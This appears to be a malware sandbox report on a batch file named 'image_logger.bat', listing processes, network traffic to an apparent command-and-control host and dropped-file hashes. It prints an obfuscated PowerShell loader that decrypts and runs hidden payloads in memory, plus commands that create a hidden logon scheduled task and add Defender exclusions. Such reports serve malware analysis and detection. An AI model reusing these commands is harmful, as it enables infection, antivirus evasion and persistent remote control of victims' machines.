C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\image_logger.bat"
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2tecc/9PWMQ7v4EpLWmOKz+cEzHQwMF8S+sfdcZa71I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MF58RaRbseGO3b+sBBeK4w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mmsUZ=New-Object System.IO.MemoryStream(,$param_var); $pPoah=New-Object System.IO.MemoryStream; $LnjlI=New-Object System.IO.Compression.GZipStream($mmsUZ, [IO.Compression.CompressionMode]::Decompress); $LnjlI.CopyTo($pPoah); $LnjlI.Dispose(); $mmsUZ.Dispose(); $pPoah.Dispose(); $pPoah.ToArray();}function execute_function($param_var,$param2_var){ $QDQTS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $jFQzj=$QDQTS.EntryPoint; $jFQzj.Invoke($null, $param2_var);}$HsbVT = 'C:\Users\Admin\AppData\Local\Temp\image_logger.bat';$host.UI.RawUI.WindowTitle = $HsbVT;$bpmTM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HsbVT).Split([Environment]::NewLine);foreach ($vwomF in $bpmTM) { if ($vwomF.StartsWith('KBtWKWGXToUMrzMdMGCO')) { $gacJz=$vwomF.Substring(20); break; }}$payloads_var=[string[]]$gacJz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_811_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_811.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_811.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_811.bat" "
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2tecc/9PWMQ7v4EpLWmOKz+cEzHQwMF8S+sfdcZa71I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MF58RaRbseGO3b+sBBeK4w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mmsUZ=New-Object System.IO.MemoryStream(,$param_var); $pPoah=New-Object System.IO.MemoryStream; $LnjlI=New-Object System.IO.Compression.GZipStream($mmsUZ, [IO.Compression.CompressionMode]::Decompress); $LnjlI.CopyTo($pPoah); $LnjlI.Dispose(); $mmsUZ.Dispose(); $pPoah.Dispose(); $pPoah.ToArray();}function execute_function($param_var,$param2_var){ $QDQTS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $jFQzj=$QDQTS.EntryPoint; $jFQzj.Invoke($null, $param2_var);}$HsbVT = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_811.bat';$host.UI.RawUI.WindowTitle = $HsbVT;$bpmTM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HsbVT).Split([Environment]::NewLine);foreach ($vwomF in $bpmTM) { if ($vwomF.StartsWith('KBtWKWGXToUMrzMdMGCO')) { $gacJz=$vwomF.Substring(20); break; }}$payloads_var=[string[]]$gacJz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3808 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF3A.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX53ypgrj20bgndg05hj3tc7z654myszwp.mca
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5068 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | movie-buddy.gl.at.ply.gg | udp |
| US | 147.185.221.16:40572 | movie-buddy.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.173.189.20.in-addr.arpa | udp |
| US | 147.185.221.16:40572 | movie-buddy.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.212.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| BE | 2.21.17.194:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.17.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.190.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.17.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/4288-0-0x00007FFEABE63000-0x00007FFEABE65000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kpxribbr.fjq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4288-1-0x0000024806DA0000-0x0000024806DC2000-memory.dmp
memory/4288-11-0x00007FFEABE60000-0x00007FFEAC921000-memory.dmp
memory/4288-12-0x00007FFEABE60000-0x00007FFEAC921000-memory.dmp
memory/4288-13-0x00007FFEABE60000-0x00007FFEAC921000-memory.dmp
memory/4288-14-0x000002481FD00000-0x000002481FD44000-memory.dmp
memory/4288-15-0x000002481FDD0000-0x000002481FE46000-memory.dmp
memory/4288-16-0x0000024806D90000-0x0000024806D98000-memory.dmp
memory/4288-17-0x000002481FAB0000-0x000002481FAEA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 661739d384d9dfd807a089721202900b |
| SHA1 | 5b2c5d6a7122b4ce849dc98e79a7713038feac55 |
| SHA256 | 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf |
| SHA512 | 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_811.vbs
| MD5 | f7693a2887f2b6bc48800f137f691cf2 |
| SHA1 | abd10e618d3cd2ab3b5a4868011f7ffb324d6b91 |
| SHA256 | 67cc98300009bb07fee562555c827b56ba7f9bc06f4fbb48c02e2db2d69720bd |
| SHA512 | fb3ec377c73fef4b505d2fed0305e6d132d46e7832ded763c974885e902aa99444586640a818d1c8666330aa70a0ace9c509c0f48fad734d83323f1dec11332a |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_811.bat
| MD5 | 4e4f69a7c3eb1df655359c62b7d8f634 |
| SHA1 | abcd84d9bc4c4e469bda80f9d2b09fd937f1c8af |
| SHA256 | 7905527e602b2147d25e7d1698c70a408bd0d94aa539f347e41c070e157feee0 |
| SHA512 | c7b50f98f05fd92cd6bc4a22d654662703f142c8e20211b43c59f92d1a90a5e429aecbed5406754ffa31ce5a96830965e60217333750692faafe4792991ec607 |
memory/4288-37-0x00007FFEABE60000-0x00007FFEAC921000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 005bc2ef5a9d890fb2297be6a36f01c2 |
| SHA1 | 0c52adee1316c54b0bfdc510c0963196e7ebb430 |
| SHA256 | 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d |
| SHA512 | f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22 |
memory/3336-48-0x00000000033E0000-0x000000000340A000-memory.dmp
memory/4540-55-0x000001ACD7B80000-0x000001ACD7B96000-memory.dmp
memory/3336-79-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1536-83-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/2748-89-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1416-88-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/912-94-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1308-92-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1708-91-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1752-87-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1572-86-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/3532-85-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/2480-90-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1900-84-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/5000-82-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/2160-81-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1372-80-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/916-93-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1080-99-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1892-104-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/2472-107-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1292-106-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1848-103-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/3668-102-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/2664-101-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1548-105-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1668-98-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/1096-100-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/2044-97-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/976-96-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
memory/712-95-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ab4f73ecd8668addd59774d55ad12af1 |
| SHA1 | bd10d9e79cd79a4a55ccc8b13efd68105ac7a197 |
| SHA256 | bc122f6a486046b38f230e50879c99f8af074c16338e91b34f953b31abed0909 |
| SHA512 | ca03b0f676826571bfc9dc11a246247a01debc3882fcee3afa90de44d3bd35e9f1524759916e557bba5d6eef325d37c594ff9858f2b5fcf907fedc0981795f22 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ae6243275bbe582c487032cce4ee483a |
| SHA1 | 80d9f3e00401b1e5f73d2a30f668d7c998222676 |
| SHA256 | 19aec4993b85584d47dd81b7599ea0c31d7a69328aa648629a351eff05f92d7e |
| SHA512 | 59ce98791ff2113ecb35546010eef869e34dea6491757bf91dc46d742070c6debc3658521c0a40c3150cc25b71f34d9aaa81c12a48c7ccff39953523830f4fd5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 83685d101174171875b4a603a6c2a35c |
| SHA1 | 37be24f7c4525e17fa18dbd004186be3a9209017 |
| SHA256 | 0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870 |
| SHA512 | 005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 1e8e2076314d54dd72e7ee09ff8a52ab |
| SHA1 | 5fd0a67671430f66237f483eef39ff599b892272 |
| SHA256 | 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f |
| SHA512 | 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | ceb7caa4e9c4b8d760dbf7e9e5ca44c5 |
| SHA1 | a3879621f9493414d497ea6d70fbf17e283d5c08 |
| SHA256 | 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9 |
| SHA512 | 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | 8abf2d6067c6f3191a015f84aa9b6efe |
| SHA1 | 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7 |
| SHA256 | ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea |
| SHA512 | c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
| MD5 | 6e5996f17a6de4a781f1794e7e2853e5 |
| SHA1 | 6410652dde9cea88efe9ffa62b11fd409a836765 |
| SHA256 | b68089689ece8210da44579a642fe26a74b99b74210cfb1078ac1441feaefc96 |
| SHA512 | 5fa8041254d6581645b19deaa6fda576a5676fd2b6e6d351a4459734b46ff9363d4bb8d546066e3e3b917312db96f66b67808c94416834f329498c1bd222e383 |
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | 9e7478a273b6cb156c6d71e6898b50f2 |
| SHA1 | f40cafa024bc3ca7c746bb613fdeed7f449ec41c |
| SHA256 | 6c6a04461fde1d9d1f16d666ee0e15423a53d6acbd97a9742367f988b5a98b9e |
| SHA512 | 723bb9306f8315669ab9292691b5ad58ac2264a57185bd2ca5d348ec12687ea28d622e6a78bfba3d35477b5f3a48a35649c151b37ffff711b7bdc154a9244de6 |
memory/4540-267-0x000001ACD8DF0000-0x000001ACD8DFC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpF3A.tmp.bat
| MD5 | 7a6dcd84ce572f5332cfc972dcc883c7 |
| SHA1 | c9a64f95a5ce08af85bcbee5474f6d23256f9f82 |
| SHA256 | 4e73e60b44e773b957e1e3c36b699d63f391657f203ff35e959d63cc4f1efd24 |
| SHA512 | 6ad2c83ae952a18815af82eb24150d32836dc00c350fd3c96d123444311898166aeec8dc22e765f12d932ad5808f122377681735d1483a95f6b7414e965b2127 |
C:\Windows\SoftwareDistribution\SLS\2B81F1BF-356C-4FA1-90F1-7581A62C6764\sls.cab
| MD5 | df05ac827e0d5ef261a0103db3d6b086 |
| SHA1 | ab26c67c4f72e4dffad5686e7f912773d6797cc9 |
| SHA256 | 4156412f0ed20b33707572e12603468fd1844c89f66aaa9509f55b2dce540c72 |
| SHA512 | 84255d98a249ab635f9b2eee382bbfe945edc09c3a63bef6dfb686061b20642861d6c26ba11e8a67eb1a9a956a2e2ec26dbd7ea93a9d34475f04f9a250fe6c90 |
C:\Windows\SoftwareDistribution\SLS\2B81F1BF-356C-4FA1-90F1-7581A62C6764\TMP2C2E.tmp
| MD5 | d410319561b5559e46f2d12a94a463f5 |
| SHA1 | 6c5aed5986ecb1acda7c6b80cfd3d41cff7faf29 |
| SHA256 | 7d33dcedb1aef041eaa4c7b1c6139843a3da71128382c93e9c516d625922d4b9 |
| SHA512 | 6ae16b3a6a79a0f0fe308a49c8cae9603743343ca0c3afc635129c92f51958593f49a06df148cb5376cde403cf7ddc3fb29dfb1774182969c0d994dd2a29d725 |
C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\sls.cab
| MD5 | 26aebc7f098768e1a48e0f2b649fc3e1 |
| SHA1 | 235ec3160bef147bb0c5cee9612bded3be87654e |
| SHA256 | 5353292450c25820cf043a70c6fb196fd88966caff54f0953e9b3e187e7d9aab |
| SHA512 | fe0d65edc4555126d44c56951d6942189b67531c9efb8e291a730de64aadec589cbad9743797d602d31adab00c6d1e66e21bc2278ebf2d443872f6127d5f5525 |
C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\TMP4E2E.tmp
| MD5 | dea84a37ac32aa0bc4931979b699d857 |
| SHA1 | d7a23cd0aebbd76a0611640df87cad7e35fc9690 |
| SHA256 | e8f013f48dd73f78bc9939654088967cc1fcd30014bccdb226ca00577860bfd9 |
| SHA512 | d2ec8cf14a56084f5a0f7a1abecd8efc9fb91f5ce1bcc027cdc7c2ae5298ad06a3a8ed78dbb11d51b32d126a878de6de50a9518e18c7b68ebb15e3c2e6fb5cb8 |
C:\Windows\SoftwareDistribution\SLS\855E8A7C-ECB4-4CA3-B045-1DFA50104289\sls.cab
| MD5 | 299890c91bb7527ee1a9c627e7cf1179 |
| SHA1 | 19f5affa595da95c6e6d5b0dd5119ce3e92ad295 |
| SHA256 | 4796b1ab25914b0025d72d9c73fb03ca405b252e68e78501a501d9ac997b6fd1 |
| SHA512 | 597a96e396ced9fd259f34746ea43caca0e7875214a03a489fb0fdd83fdc29973c7b48dc54fc6acac28c15f408e45efa1fdf869f0747ca0e5fab7ccac35b7414 |
C:\Windows\SoftwareDistribution\SLS\855E8A7C-ECB4-4CA3-B045-1DFA50104289\TMP5091.tmp
| MD5 | 88269d564f5ce95389613f63af9c28ae |
| SHA1 | 4d46e734b4e845bd2f23e30e17067ac9cb14876d |
| SHA256 | 6cbf1a36e9669e9bf0c1e63148bc60b13ad59f0934e19a42fff40eb3f3722a93 |
| SHA512 | 0f2316d93848d51568399d5a46d748e3f08468e2d43e2de40a1bba395e14e64e9e900aace944b91135b185b18bca959b882026500fe73db6068efebb4c0673bb |
C:\Windows\SoftwareDistribution\Download\929ae566f1f233c13a3bbf347b449657\BlockMap.xml
| MD5 | fafffc0eeda974c0d8413d7cb21e703e |
| SHA1 | 9a730acd930eb8e9d0fd845890650ce0db85b14b |
| SHA256 | dab722c09228d338a616f315c20032cc9ba777a6e0222264b28341cb14c5ce1e |
| SHA512 | bbe16408f0f18d7f671a925b0f59b34fd853fc23aaf6a4a4f32d7f7a14376bc2c26b3b4ce5afa8a12d5455c71075c7a90b950a5958d7b71808d064b5e0946cb0 |
C:\Windows\SoftwareDistribution\Download\4fc661cc8878223712c18124f63a67cb\BlockMap.xml
| MD5 | 2bec8080d45d8d7f9bf122a2e6b030bc |
| SHA1 | 576ef51c438f0d3fed44c9caaf4bd543e5ff243b |
| SHA256 | 1cae715adaf9881738af4de5ef5e3eb43cadd19778d1cd111b57e094c364fd64 |
| SHA512 | 102d5c32ac3a2cd256af4ea086746a6986fd427ab0f4405002a0b2ec7221344a172903c3a6096db229426c599aae6d797ec16694ac4eccae215c2cbdb7047110 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | 637cc28b934114e6f2f7fd3a28414a3c |
| SHA1 | e78de6cbc2fc30fd98249d41f3cc465147915ea9 |
| SHA256 | 3aaf0fcbdb32e15abad363931c7b56fc5aa3a1c8b4a9796682dac6a8346bd795 |
| SHA512 | 4af80f922651056457ca22784b48b6253738f2b22f9b50e6e48fef22bbcfba6de6b1e8d22b28d09bf378cc49e2fa3545b9ecd0d35c1e290471baa5bfba0cae29 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
| MD5 | 9706169038109a62bdffb734bbdb57ef |
| SHA1 | 7ac9b3e9102452ab004cfac0eac125f6bed68785 |
| SHA256 | 01e91aacf2d8a0316d5c4654fbc38d1133e55040d9ac190fc454f7f71ee32282 |
| SHA512 | e3d8cc97fbdf241a1d2cceeb5d647312ff5459eab44274fd171b0dc7b100bbd239fdd8b5007b3b15aa522d5c0f1390b39074a14483501decc7be10d968921359 |
C:\Windows\SoftwareDistribution\Download\b38597ddf936e9cb72180a70de5f06a3\BlockMap.xml
| MD5 | ab893aaab955732ebc08381c0558bb58 |
| SHA1 | 380c8979a68c1725474fe184098e89b21ebd3d4d |
| SHA256 | 82e5e0f5190f1a6c6de1a904a33db3f5cf6ed6d2dbe9c8c778ea4d5b64cc0e0b |
| SHA512 | b210ea82befba25059169f6c936335a862bfb6ba30fd80ff37776022cda8561ea951f055771861a0977de9d3ca8599110a834f2d745218251a60c7ec703f8199 |